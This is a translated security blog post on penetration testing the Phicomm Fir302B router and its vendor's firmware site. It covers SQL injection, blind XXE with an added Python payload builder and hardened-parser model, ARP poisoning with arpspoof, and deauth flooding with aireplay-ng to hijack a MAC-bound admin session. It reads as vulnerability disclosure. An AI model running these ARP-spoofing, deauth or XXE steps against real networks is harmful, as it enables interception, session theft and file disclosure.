
    Penetration testing the Phicomm Fir302B router

    Posted by 铁匠 on 2017-01-03 01:40:44

    0x00 Firmware release site: weak password + SQL injection

    The Fir302B board is fairly friendly: once the case is opened, GND, TX, RX and VCC are visible right on the PCB, although no header pins are fitted.
    I only had a TTL adapter board and three Dupont wires on hand, so I wired straight onto the UART:

    Once the self-test finishes, two POST requests show up in the console output. They send the current device fingerprint, the router's admin credentials and the cloud account credentials to a single address.

    That URL is a firmware release site, and its admin back end uses a weak password.

    The employee-ID lookup (查询工号) is vulnerable to SQL injection.

    When I tested yesterday there was also an arbitrary file read in the site's Spring framework; by today it had already been fixed.

    0x01 Firmware release site: SOAP-based blind XXE

    Capture the router's traffic to see the complete request:

    root@kali:~# nmap -T4 -O 10.8.5.* -vv
    Nmap scan report for 10.8.5.232
    Host is up, received arp-response (-0.076s latency).
    All 1000 scanned ports on 10.8.5.232 are filtered because of 1000 no-responses
    MAC Address: F0:EB:D0:54:43:E6 (Shanghai Feixun Communication Co.)
    Too many fingerprints match this host to give specific OS details
    TCP/IP fingerprint:
    SCAN(V=6.49BETA4%E=4%D=11/14%OT=%CT=%CU=%PV=Y%DS=1%DC=D%G=N%M=F0EBD0%TM=58295455%P=x86_64-pc-linux-gnu)
    SEQ(II=I)
    U1(R=N)
    IE(R=Y%DFI=N%TG=40%CD=S)
    
    root@kali:~# traceroute baidu.com
    traceroute to baidu.com (111.13.101.208), 30 hops max, 60 byte packets
     1  10.8.5.1 (10.8.5.1)  10.091 ms  10.522 ms  10.715 ms
    root@kali:~# echo 1 >> /proc/sys/net/ipv4/ip_forward
    root@kali:~# arpspoof -i eth0 -t 10.8.5.1 10.8.5.232
    ...
    root@kali:~# arpspoof -i eth0 -t 10.8.5.232 10.8.5.1
    ...
    root@kali:~# tcpdump -i eth0 -w victim.pcap -vv
    tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
    ^C905 packets captured
    905 packets received by filter
    0 packets dropped by kernel

    Because the network is switched, a plain promiscuous-mode capture does not see the router's packets.

    So: scan the upstream subnet to find the router's IP, locate the gateway, ARP-poison both directions, reboot the router, run tcpdump and wait for the self-test to finish.

    Filtering for HTTP in Wireshark yields the complete request.

    It turns out the endpoint accepts a custom DTD and loads external entities:

    So, read /var/log/messages:
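To make the parser misconfiguration concrete, here is an added example; it is not code from the post, and it is not the firmware site's real parser, which the post does not show. It models the server side of the router's check-in: a SOAP report whose XML parser honours a client-supplied DTD and fetches whatever SYSTEM identifier the document names, next to a hardened parser that rejects any DOCTYPE outright. The element names (report, deviceId), the credential check and the log line are constructed. The post's instance was blind, so the file contents were not reflected there; this example shows the same flaw in-band so the leak is visible and the whole thing runs offline.

```python
import os
import tempfile
import urllib.request
from xml.parsers import expat

# Constructed check-in body modelled on the SOAP report the router posts.
# The real field names are not on the page and are assumed here.
SOAP_TEMPLATE = """<?xml version="1.0"?>
<!DOCTYPE soap:Envelope [
  <!ENTITY xxe SYSTEM "{url}">
]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <report><deviceId>&xxe;</deviceId></report>
  </soap:Body>
</soap:Envelope>
"""


def build_payload(url):
    """Attacker side: an envelope whose DTD binds &xxe; to an external resource."""
    return SOAP_TEMPLATE.format(url=url).encode()


def parse_report(xml_bytes, resolve_external_entities):
    """Server side. Returns the text of <deviceId>.

    resolve_external_entities=True reproduces the vulnerable class of parser:
    its external-entity callback fetches whatever SYSTEM id the document names.
    False is the hardened form: any DOCTYPE is rejected, so the client can
    declare neither external nor internal entities.
    """
    parser = expat.ParserCreate()
    state = {"in_field": False, "text": []}

    def start(name, attrs):
        state["in_field"] = name == "deviceId"

    def end(name):
        if name == "deviceId":
            state["in_field"] = False

    def chars(data):
        if state["in_field"]:
            state["text"].append(data)

    def fetch_entity(context, base, system_id, public_id):
        # BUG: file://, http://, ... are all fetched with the server's privileges
        # and spliced into the document as if the client had sent the bytes.
        with urllib.request.urlopen(system_id) as resp:
            body = resp.read()
        child = parser.ExternalEntityParserCreate(context)  # inherits handlers
        child.Parse(body, True)
        return 1

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise ValueError("DOCTYPE is not allowed in device reports")

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars
    if resolve_external_entities:
        parser.ExternalEntityRefHandler = fetch_entity
    else:
        parser.StartDoctypeDeclHandler = reject_doctype
    parser.Parse(xml_bytes, True)
    return "".join(state["text"]).strip()


def demo():
    """Run both parsers against a constructed stand-in for /var/log/messages
    written to a temp dir. Returns (text leaked by the weak parser, whether
    the hardened parser refused the document)."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "messages")
        with open(path, "w") as f:  # constructed log line
            f.write("Nov  3 14:37:01 fwsite sshd[1222]: Accepted password for root\n")
        payload = build_payload("file://" + path)
        leaked = parse_report(payload, resolve_external_entities=True)
        try:
            parse_report(payload, resolve_external_entities=False)
            blocked = False
        except ValueError:
            blocked = True
    return leaked, blocked


if __name__ == "__main__":
    print(demo())
```

The weak variant is exactly what a "resolve everything" entity callback looks like; the hardened one does not try to filter URL schemes (an allow-list is still a fetch on behalf of the client) but refuses the DTD, which is the only place the client could declare an entity in the first place.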

    0x02 Authenticated session hijacking

    This one is, ironically, a vulnerability produced by a defence against cookies being leaked through ARP sniffing: the router ties the login to the client rather than to a cookie.
    A quick test showed that after a deauth knocks the client off the network, the session is not invalidated immediately; spoofing the client's MAC address is enough to get into the router's admin interface.

    root@kali:~# airmon-ng check kill
    
    Killing these processes:
    
      PID Name
     1222 wpa_supplicant
    
    root@kali:~# ifconfig 
    lo        Link encap:Local Loopback  
              inet addr:127.0.0.1  Mask:255.0.0.0
              inet6 addr: ::1/128 Scope:Host
              UP LOOPBACK RUNNING  MTU:65536  Metric:1
              RX packets:12 errors:0 dropped:0 overruns:0 frame:0
              TX packets:12 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:0 
              RX bytes:720 (720.0 B)  TX bytes:720 (720.0 B)
    
    root@kali:~# airmon-ng start wlan0
    
    
    PHY    Interface    Driver        Chipset
    
    phy0    wlan0        iwlwifi        Intel Corporation Centrino Ultimate-N 6300 (rev 3e)
    
            (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
            (mac80211 station mode vif disabled for [phy0]wlan0)
    
    root@kali:~# airodump-ng wlan0mon -w picTemp/wifi.csv
     CH  1 ][ Elapsed: 12 s ][ 2016-11-03 14:37
    
     BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
    
     F0:EB:D0:54:43:E7  -18        9        2    0  11  54e  WPA2 CCMP   PSK  PHICOMM_5443E7                                                             
     3C:8C:40:49:3D:90  -29        3        3    0   1  54e. OPN              mxxz-chinaunicom                                                           
     B0:68:B6:F8:A6:18  -30       14        0    0   8  54e. WPA2 CCMP   PSK  moresecret                                                                 
     D4:EE:07:2B:BE:02  -48       24        3    0   9  54e  WPA2 CCMP   PSK  moresec                                                                    
     22:C0:90:A8:12:83  -45       23        0    0   6  54e. WPA2 CCMP   PSK  LieBaoWiFi355
    
    root@kali:~# airodump-ng wlan0mon --bssid F0:EB:D0:54:43:E7 -c 11
    CH  7 ][ Elapsed: 36 s ][ 2016-11-03 14:48                                                                                                                                                                                              
     BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                  
     F0:EB:D0:54:43:E7  -19       26        3    0  11  54e  WPA2 CCMP   PSK  PHICOMM_5443E7  
    
     BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                                                                                                                                                                                
     F0:EB:D0:54:43:E7  30:F7:72:41:91:2B  -38    0 - 1     23       15   
    
    root@kali:~# aireplay-ng -0 0 -a F0:EB:D0:54:43:E7 -c 30:F7:72:41:91:2B wlan0mon
    15:04:05  Waiting for beacon frame (BSSID: F0:EB:D0:54:43:E7) on channel 11
    15:04:06  Sending 64 directed DeAuth. STMAC: [30:F7:72:41:91:2B] [13|60 ACKs]
    15:04:06  Sending 64 directed DeAuth. STMAC: [30:F7:72:41:91:2B] [25|48 ACKs]
    15:04:07  Sending 64 directed DeAuth. STMAC: [30:F7:72:41:91:2B] [ 0| 0 ACKs]
    15:04:07  Sending 64 directed DeAuth. STMAC: [30:F7:72:41:91:2B] [54| 7 ACKs]
    15:04:08  Sending 64 directed DeAuth. STMAC: [30:F7:72:41:91:2B] [56| 0 ACKs]
    15:04:09  Sending 64 directed DeAuth. STMAC: [30:F7:72:41:91:2B] [55| 0 ACKs]
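The following added example (not the router's firmware, whose code the post does not show) models the MAC-bound login described above, next to a hardened version that revokes the session the moment the AP sees the station disassociate and additionally requires a per-session secret, so a cloned MAC on its own is not a session. The idle timeout, the credential check and the disassociation hook are assumptions; the victim MAC is the station from the airodump listing.

```python
import hmac
import secrets


class MacBoundSessions:
    """Toy model of the login the post describes: after a successful login the
    router remembers the client MAC as authenticated, so a sniffed cookie by
    itself is useless (the property the design was after). Constructed model,
    not the router's real code."""

    IDLE_TIMEOUT = 600  # seconds, assumed

    def __init__(self, clock):
        self.clock = clock
        self.authed = {}  # mac -> last-seen time

    def login(self, mac, password):
        if password == "admin":  # constructed credential check
            self.authed[mac] = self.clock()
            return True
        return False

    def is_authenticated(self, mac):
        seen = self.authed.get(mac)
        if seen is None or self.clock() - seen > self.IDLE_TIMEOUT:
            self.authed.pop(mac, None)
            return False
        self.authed[mac] = self.clock()
        return True
    # BUG: nothing tells this table when the station leaves the BSS, so after
    # a deauth the entry lives on until IDLE_TIMEOUT and any station that
    # re-associates with the victim's MAC inherits the login.


class HardenedSessions:
    """Same MAC binding, plus (a) a random per-session token the browser must
    present, so a cloned MAC alone is not a session, and (b) a hook the AP
    calls on deauth/disassoc that revokes the session at once."""

    IDLE_TIMEOUT = 600

    def __init__(self, clock):
        self.clock = clock
        self.sessions = {}  # mac -> (token, last-seen time)

    def login(self, mac, password):
        if password != "admin":
            return None
        token = secrets.token_hex(16)
        self.sessions[mac] = (token, self.clock())
        return token  # would be set as an HttpOnly cookie

    def is_authenticated(self, mac, token):
        entry = self.sessions.get(mac)
        if entry is None:
            return False
        expected, seen = entry
        if self.clock() - seen > self.IDLE_TIMEOUT:
            self.sessions.pop(mac, None)
            return False
        if not hmac.compare_digest(expected, token or ""):
            return False
        self.sessions[mac] = (expected, self.clock())
        return True

    def on_station_disassociated(self, mac):
        """Assumed hook: the AP calls this when the station is deauthed."""
        self.sessions.pop(mac, None)


def simulate_attack():
    """Victim logs in, gets deauthed, and the attacker re-associates with the
    victim's MAC a few seconds later. Returns whether each design lets the
    attacker in."""
    now = [1000.0]

    def clock():
        return now[0]

    victim_mac = "30:f7:72:41:91:2b"  # station from the airodump listing
    weak = MacBoundSessions(clock)
    strong = HardenedSessions(clock)
    weak.login(victim_mac, "admin")
    strong.login(victim_mac, "admin")  # token stays in the victim's browser

    now[0] += 30  # deauth flood; station drops off the BSS
    strong.on_station_disassociated(victim_mac)
    now[0] += 5   # attacker clones the MAC and associates

    return {
        "mac_only": weak.is_authenticated(victim_mac),
        "hardened": strong.is_authenticated(victim_mac, token=None),
    }


if __name__ == "__main__":
    print(simulate_attack())
```

The model assumes the attacker can associate to the BSS at all (the network is open, or the PSK is known); the post does not say which applied. Either fix on its own narrows the window: the disassociation hook closes the gap the post exploits, and the token means MAC cloning has to be combined with cookie theft, which is the attack the MAC binding was meant to stop.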

    The admin site is almost entirely static; the password is hardcoded in the page, merely base64-encoded.

    0x03 Advertisement

    Finally, 影武者实验室 is continuously hiring sneaky penetration testers, experienced security researchers and sharp junior interns. If you are interested, contact hr@moresec.cn.
